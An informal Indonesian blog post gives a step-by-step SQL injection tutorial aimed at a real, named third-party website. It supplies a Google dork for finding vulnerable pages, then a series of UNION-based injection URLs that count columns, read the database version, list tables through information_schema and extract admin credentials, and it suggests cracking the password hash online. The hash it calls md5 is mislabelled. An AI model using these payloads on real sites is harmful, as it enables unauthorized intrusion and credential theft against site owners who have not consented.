Sponsored By
Photobucket
Photobucket
Photobucket
t" />

» »Unlabelled » Tutorial SQL Injection

Tutorial SQL Injection

Diposting oleh Unknown - 0 komentar


wkowkowko akirnya Zulv4n_T3chN0 Comeback wkwkwkw :P :P xD
oke kali ini mau share ah caranya sql injection aslina aku jga bngng sql injection wkwkwkw :P tpi gpp buat bljr bersama2
Dork Mas Google yg pinter:
Dork : "inurl:content.php?id=" site:info

 saya ambil web ini aja http://www.mirbg.info

step pertama siapkan rokok jika perlu sma kopi
wkkwkkw langsung aja kita ke step 1

1.Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in/home/mirbg/public_html/content.php on line 9
klo kluar tulisanya gt bsa brarti

2.Lakukan perintah order by sampai pesan eror muncul lagi
http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)

3.Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))

4.langkah ke 4 kita haru tau versi berapa web tersebut ketikan perintah
 version() atau @@version
http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--

Note: Keterangan : kita bisa lanjutkan tutorial ini jika target web versi 5.1.56-log, kalu versi 4 main tebak-tebakan , bagi yang mau boleh aja..

5.Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--
example
http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--

6.dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

akirnya udh bukak tabelnya kluarkan adminya wkakakakaak klo md5 paswordnya kyk gni
74626c5f7374616666
bsa decrypt di online silhkan cri aja di mas google yg pinter wkwk :P


sumbernya:http://www.setandarisurga.com/2012/02/step-by-step-sql-injection-newbie.html

Posting Komentar - Back to Content